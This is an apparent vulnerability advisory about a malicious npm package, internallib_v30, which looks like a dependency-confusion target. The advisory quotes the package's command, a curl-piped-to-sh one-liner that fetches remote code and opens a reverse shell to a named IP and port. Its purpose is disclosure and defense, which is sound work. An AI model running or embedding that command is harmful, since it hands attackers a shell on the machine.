internallib_v30@1.0.1
Vulnerability report · Last retrieved from osv.dev October 6, 2026 at 2:31 PM UTC
OSV ID
MAL-2026-17633
Ecosystem
npm
Summary
internallib_v30@1.0.1 ships a single index.js whose exported command() function invokes /bin/bash -c with 'curl https://reverse-shell.sh/10.0.19.80:8443 | sh', fetching a remote shell script over HTTPS and piping it directly into sh. Invoking the exported function from any consumer causes the installer host to download and execute attacker-staged code that opens a reverse shell to 10.0.19.80 on port 8443. The package has no documented legitimate purpose, empty author/description metadata, and a name consistent with an internal/dependency-confusion target.
Source: amazon-inspector (52b503d4f5d82ea2a67ac1cb9e3bbb82d009d375495f72cf13623f998a239cfe)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.